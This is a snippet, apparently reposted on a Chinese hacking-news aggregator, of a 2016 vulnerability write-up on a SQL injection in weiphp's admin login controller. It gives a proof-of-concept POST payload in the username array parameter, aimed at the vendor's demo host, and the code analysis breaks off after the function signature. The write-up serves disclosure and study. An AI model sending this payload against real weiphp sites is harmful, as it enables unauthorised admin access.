记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

weiphp /Application/Admin/Controller/PublicController.class.php Login SQL Injection Vul – .Little Hann

1. 漏洞描述 Relevant Link: http://www.wooyun.org/bugs/wooyun-2016-0190216 2. 漏洞触发条件 0x1: POC http://demo.weiphp.cn/index.php?s=/Admin/Public/login.html post: username[0]=admin'&username[1]=xxx*&password=123 3. 漏洞代码分析 /Application/Admin/Controller/PublicController.class.php public function login($username = null, $password = null, $verify = null){
发布时间:2016-04-09 04:45 | 阅读:153414 | 评论:0 | 标签:PHP Sql weiphp 注入

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词